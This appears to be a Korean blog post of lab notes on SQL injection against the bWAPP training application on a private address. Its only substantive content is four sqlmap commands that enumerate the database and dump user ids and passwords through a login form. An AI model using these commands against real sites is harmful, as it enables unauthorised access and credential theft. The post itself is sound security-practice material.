Bazinga!

SQL인젝션 본문

Web

SQL인젝션

Bazinga! 2024. 8. 20. 15:17

1.

2.

3.

 

 

4. column 확인

 

table_name = "users"

 

 

5. data 추출

 

 

6. boolean-based

 

 

 

 

 

 

 

 

7. Login form/Hero

 

 

 

 

 

 

8. Login Form/User

 

 

sqlmap -u "http://192.168.213.129/bWAPP/sqli_16.php" --cookie="security_level=0; has_js=1; PHPSESSID=e67786e59e6d0f6469909fe8775fb680" --data "login=aaaa&password=bbbb&form=submit" --dbs

 

 

sqlmap -u "http://192.168.213.129/bWAPP/sqli_16.php" --cookie="security_level=0; has_js=1; PHPSESSID=e67786e59e6d0f6469909fe8775fb680" --data "login=aaaa&password=bbbb&form=submit" -D bwapp --tables

 

sqlmap -u "http://192.168.213.129/bWAPP/sqli_16.php" --cookie="security_level=0; has_js=1; PHPSESSID=e67786e59e6d0f6469909fe8775fb680" --data "login=aaaa&password=bbbb&form=submit" -D bwapp -T users --columns

sqlmap -u "http://192.168.213.129/bWAPP/sqli_16.php" --cookie="security_level=0; has_js=1; PHPSESSID=e67786e59e6d0f6469909fe8775fb680" --data "login=aaaa&password=bbbb&form=submit" -D bwapp -T users -C id,password --dump

 

 

 

 

 

'Web' 카테고리의 다른 글

Cookie/Session  (0) 2024.08.26
LFI / RFI 취약점 실습  (0) 2024.08.21
bWAPP 디렉토리 순회 & 인증결함 취약점  (0) 2024.08.21
bWAPP OS 명령 인젝션  (0) 2024.08.20
bWAPP 웹 해킹 실습  (0) 2024.08.19